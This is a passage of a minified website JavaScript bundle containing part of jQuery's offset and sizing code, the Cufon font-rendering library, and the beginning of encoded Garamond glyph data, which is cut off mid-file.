computedStyle=defaultView?defaultView.getComputedStyle(elem,null):elem.currentStyle;top-=elem.scrollTop;left-=elem.scrollLeft;if(elem===offsetParent){top+=elem.offsetTop;left+=elem.offsetLeft;if(jQuery.offset.doesNotAddBorder&&!(jQuery.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(elem.nodeName))){top+=parseFloat(computedStyle.borderTopWidth)||0;left+=parseFloat(computedStyle.borderLeftWidth)||0;}
prevOffsetParent=offsetParent,offsetParent=elem.offsetParent;}
if(jQuery.offset.subtractsBorderForOverflowNotVisible&&computedStyle.overflow!=="visible"){top+=parseFloat(computedStyle.borderTopWidth)||0;left+=parseFloat(computedStyle.borderLeftWidth)||0;}
prevComputedStyle=computedStyle;}
if(prevComputedStyle.position==="relative"||prevComputedStyle.position==="static"){top+=body.offsetTop;left+=body.offsetLeft;}
if(jQuery.offset.supportsFixedPosition&&prevComputedStyle.position==="fixed"){top+=Math.max(docElem.scrollTop,body.scrollTop);left+=Math.max(docElem.scrollLeft,body.scrollLeft);}
return{top:top,left:left};};}
jQuery.offset={initialize:function(){var body=document.body,container=document.createElement("div"),innerDiv,checkDiv,table,td,bodyMarginTop=parseFloat(jQuery.curCSS(body,"marginTop",true))||0,html="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";jQuery.extend(container.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"});container.innerHTML=html;body.insertBefore(container,body.firstChild);innerDiv=container.firstChild;checkDiv=innerDiv.firstChild;td=innerDiv.nextSibling.firstChild.firstChild;this.doesNotAddBorder=(checkDiv.offsetTop!==5);this.doesAddBorderForTableAndCells=(td.offsetTop===5);checkDiv.style.position="fixed",checkDiv.style.top="20px";this.supportsFixedPosition=(checkDiv.offsetTop===20||checkDiv.offsetTop===15);checkDiv.style.position=checkDiv.style.top="";innerDiv.style.overflow="hidden",innerDiv.style.position="relative";this.subtractsBorderForOverflowNotVisible=(checkDiv.offsetTop===-5);this.doesNotIncludeMarginInBodyOffset=(body.offsetTop!==bodyMarginTop);body.removeChild(container);body=container=innerDiv=checkDiv=table=td=null;jQuery.offset.initialize=jQuery.noop;},bodyOffset:function(body){var top=body.offsetTop,left=body.offsetLeft;jQuery.offset.initialize();if(jQuery.offset.doesNotIncludeMarginInBodyOffset){top+=parseFloat(jQuery.curCSS(body,"marginTop",true))||0;left+=parseFloat(jQuery.curCSS(body,"marginLeft",true))||0;}
return{top:top,left:left};},setOffset:function(elem,options,i){if(/static/.test(jQuery.curCSS(elem,"position"))){elem.style.position="relative";}
var curElem=jQuery(elem),curOffset=curElem.offset(),curTop=parseInt(jQuery.curCSS(elem,"top",true),10)||0,curLeft=parseInt(jQuery.curCSS(elem,"left",true),10)||0;if(jQuery.isFunction(options)){options=options.call(elem,i,curOffset);}
var props={top:(options.top-curOffset.top)+curTop,left:(options.left-curOffset.left)+curLeft};if("using"in options){options.using.call(elem,props);}else{curElem.css(props);}}};jQuery.fn.extend({position:function(){if(!this[0]){return null;}
var elem=this[0],offsetParent=this.offsetParent(),offset=this.offset(),parentOffset=/^body|html$/i.test(offsetParent[0].nodeName)?{top:0,left:0}:offsetParent.offset();offset.top-=parseFloat(jQuery.curCSS(elem,"marginTop",true))||0;offset.left-=parseFloat(jQuery.curCSS(elem,"marginLeft",true))||0;parentOffset.top+=parseFloat(jQuery.curCSS(offsetParent[0],"borderTopWidth",true))||0;parentOffset.left+=parseFloat(jQuery.curCSS(offsetParent[0],"borderLeftWidth",true))||0;return{top:offset.top-parentOffset.top,left:offset.left-parentOffset.left};},offsetParent:function(){return this.map(function(){var offsetParent=this.offsetParent||document.body;while(offsetParent&&(!/^body|html$/i.test(offsetParent.nodeName)&&jQuery.css(offsetParent,"position")==="static")){offsetParent=offsetParent.offsetParent;}
return offsetParent;});}});jQuery.each(["Left","Top"],function(i,name){var method="scroll"+name;jQuery.fn[method]=function(val){var elem=this[0],win;if(!elem){return null;}
if(val!==undefined){return this.each(function(){win=getWindow(this);if(win){win.scrollTo(!i?val:jQuery(win).scrollLeft(),i?val:jQuery(win).scrollTop());}else{this[method]=val;}});}else{win=getWindow(elem);return win?("pageXOffset"in win)?win[i?"pageYOffset":"pageXOffset"]:jQuery.support.boxModel&&win.document.documentElement[method]||win.document.body[method]:elem[method];}};});function getWindow(elem){return("scrollTo"in elem&&elem.document)?elem:elem.nodeType===9?elem.defaultView||elem.parentWindow:false;}
jQuery.each(["Height","Width"],function(i,name){var type=name.toLowerCase();jQuery.fn["inner"+name]=function(){return this[0]?jQuery.css(this[0],type,false,"padding"):null;};jQuery.fn["outer"+name]=function(margin){return this[0]?jQuery.css(this[0],type,false,margin?"margin":"border"):null;};jQuery.fn[type]=function(size){var elem=this[0];if(!elem){return size==null?null:this;}
if(jQuery.isFunction(size)){return this.each(function(i){var self=jQuery(this);self[type](size.call(this,i,self[type]()));});}
return("scrollTo"in elem&&elem.document)?elem.document.compatMode==="CSS1Compat"&&elem.document.documentElement["client"+name]||elem.document.body["client"+name]:(elem.nodeType===9)?Math.max(elem.documentElement["client"+name],elem.body["scroll"+name],elem.documentElement["scroll"+name],elem.body["offset"+name],elem.documentElement["offset"+name]):size===undefined?jQuery.css(elem,type):this.css(type,typeof size==="string"?size:size+"px");};});window.jQuery=window.$=jQuery;})(window);;
// ---- bb5bfac81e_minify_cufon-yui.js
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return!!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());;
// ---- 50f16fa4a0_minify_Garamond_400-Garamond_700-Garamond_italic_400.font.js
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"215,-1200v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217","w":683},{"d":"218,-494v12,-195,2,-368,2,-566v0,-55,3,-116,-14,-160v-81,-27,-63,-10,-248,-20r-1,-42r355,-3v11,0,23,1,37,4r-2,110v5,102,-6,218,-4,314r10,489v-4,89,1,183,1,275v0,119,-2,270,0,409r2,160r-391,1r-1,-43v78,2,229,3,252,-19v16,-96,13,-298,11,-421","w":555},{"d":"648,-1v-324,114,-561,-131,-548,-476v12,-299,130,-480,302,-632v112,-99,233,-170,385,-201v6,10,10,21,13,33v-4,7,-10,12,-19,15v-89,33,-132,61,-240,151v-68,57,-190,226,-223,309v-40,102,-75,235,-78,404v-3,152,111,392,264,383v172,-9,219,-174,222,-366v3,-185,-69,-315,-216,-325v-41,-2,-66,30,-83,-19v21,-17,83,-36,111,-39v5,0,35,5,91,15v31,17,82,30,102,49v82,76,123,132,144,299r-5,100v-32,137,-50,158,-134,246v-22,23,-52,41,-88,54","w":960},{"d":"971,-384v0,222,-220,420,-464,411v-246,-9,-434,-172,-434,-429v0,-176,112,-317,238,-376v61,-28,135,-42,222,-42v241,0,438,200,438,436xm227,-381v0,215,102,369,288,369v199,0,301,-169,301,-382v0,-187,-87,-395,-291,-387v-209,9,-298,157,-298,400xm724,-1056v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm380,-1056v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","k":{"y":39,"x":39,"w":27,"v":27}},{"d":"1031,-866v-10,59,-9,338,4,440v0,6,-1,14,-3,24v-8,4,-11,4,-20,4v-26,-43,-56,-195,-86,-214v-68,-44,-206,-22,-318,-22v-93,0,-153,2,-182,6r0,446v6,120,-9,139,87,140r258,2v329,1,359,-26,467,-256v17,-37,29,-52,58,-33v-37,123,-46,152,-46,273v0,22,-5,40,-16,55r-851,6r-308,9v-22,1,-28,-10,-25,-30v24,-30,179,-17,195,-37v21,-26,13,-82,13,-126r0,-625r-5,-285v-5,-141,6,-126,-120,-137v-39,-3,-97,2,-75,-43v6,-3,11,-5,16,-5r156,6v83,-4,167,4,250,2r306,-6v15,0,53,2,114,4v52,2,111,4,159,2r83,-3v34,7,8,76,8,101v0,69,7,128,7,176v0,12,-17,8,-26,5v-29,-60,-71,-181,-124,-228v-142,-24,-336,-3,-502,-5v-37,0,-59,5,-66,14v-11,16,-17,63,-17,141v0,4,7,285,5,379v143,12,307,11,460,1v86,-6,69,-23,85,-115v10,-61,12,-98,57,-81v1,5,2,10,2,15xm546,-1622v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217","w":1344},{"d":"166,-696v0,-11,-5,-20,-16,-29r-117,-28r0,-32r108,2v50,-4,144,-1,154,0r-6,381v0,117,3,191,11,220v25,105,194,118,296,66v44,-22,83,-45,114,-74v10,-105,9,-227,9,-339v0,-108,-5,-169,-16,-183v-1,-19,-123,-32,-173,-39v-8,-14,-9,-19,-5,-31v90,-6,241,0,321,-2r2,73r-10,457r4,136v13,29,29,22,74,24v9,0,33,2,74,6r1,30v-117,24,-185,49,-273,74v-10,-58,-2,-90,-6,-151v-88,62,-180,154,-311,154v-172,0,-241,-132,-238,-344v-1,-23,6,-91,5,-103xm635,-1277v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":1003},{"d":"620,-1v-176,12,-363,-4,-556,6r-20,-4v-4,-14,-1,-19,12,-31v97,-11,152,-19,165,-24v9,-4,25,-18,24,-41v-1,-10,12,-196,10,-267r-3,-119r2,-566v-4,-145,4,-153,-113,-175v-66,-13,-85,1,-93,-31v-2,-44,81,-23,119,-33v201,0,530,-16,657,30v109,39,195,148,196,287v0,123,-64,216,-193,281v-22,11,-39,21,-52,30v80,154,225,423,327,542v51,59,99,67,210,88v1,14,1,18,0,31v-91,1,-198,2,-321,2v-9,0,-21,-1,-36,-2r-315,-569v-36,-45,-40,-63,-101,-63r-113,0v-2,21,-3,65,-3,131r0,342v-1,26,8,75,35,84v9,9,106,33,154,44v5,7,8,16,8,27xm428,-684v109,4,243,-9,313,-58v51,-35,99,-124,96,-208v-3,-104,-62,-199,-155,-241v-72,